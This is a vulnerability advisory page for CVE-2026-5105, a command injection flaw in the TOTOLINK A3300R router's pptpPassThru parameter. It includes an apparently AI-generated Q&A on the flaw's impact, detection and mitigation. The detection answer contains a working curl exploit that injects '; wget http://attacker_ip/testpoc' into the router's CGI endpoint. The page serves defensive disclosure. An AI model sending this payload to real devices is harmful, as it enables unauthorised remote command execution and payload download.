CVE-2026-5105
Remote Command Injection in Totolink A3300R VPN Parameter Handler
Publication date: 2026-03-30
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| totolink | a3300r_firmware | 17.0.0cu.557_b20221024 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-5105 is a command injection vulnerability in the TOTOLINK A3300R router, version 17.0.0cu.557_b20221024. It exists in the function that handles the parameter "pptpPassThru" within the router's embedded HTTP server. An attacker can send a specially crafted HTTP POST request to the router's CGI endpoint with a malicious value for "pptpPassThru", which gets executed as an operating system command on the device.
This happens because the parameter is formatted into a buffer and then passed to a system function that executes it, allowing arbitrary commands to run remotely on the router.
How can this vulnerability impact me? :
This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected router. This can lead to unauthorized control over the device, enabling attackers to download malicious files, alter configurations, or disrupt network operations.
Such control could be used to compromise the security and privacy of the network connected to the router, potentially leading to data theft, network downtime, or further attacks on connected devices.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious HTTP POST requests sent to the router's CGI endpoint /cgi-bin/cstecgi.cgi that contain the pptpPassThru parameter with unusual or malicious command injection payloads.
A practical detection method is to capture and analyze network traffic for POST requests with JSON bodies targeting /cgi-bin/cstecgi.cgi and inspect the pptpPassThru parameter for injected commands such as wget or other shell commands.
Example command to detect such attempts using tcpdump on the network interface connected to the router:
- tcpdump -A -s 0 'tcp dst port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep -i pptpPassThru
Alternatively, using curl to test the vulnerability by sending a crafted POST request with a command injection payload in pptpPassThru can confirm if the device is vulnerable.
- curl -X POST http://[router_ip]/cgi-bin/cstecgi.cgi -H 'Content-Type: application/json' -d '{"pptpPassThru":"; wget http://attacker_ip/testpoc"}'
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the router's management interface to trusted networks only, such as limiting access to the LAN side and disabling remote management if enabled.
Additionally, monitor and block suspicious HTTP POST requests targeting /cgi-bin/cstecgi.cgi that contain the pptpPassThru parameter.
If possible, update the router firmware to a version where this vulnerability is patched or contact the vendor for a security update.
As a temporary workaround, consider disabling or restricting the vulnerable CGI endpoint or the affected function if the router's configuration allows.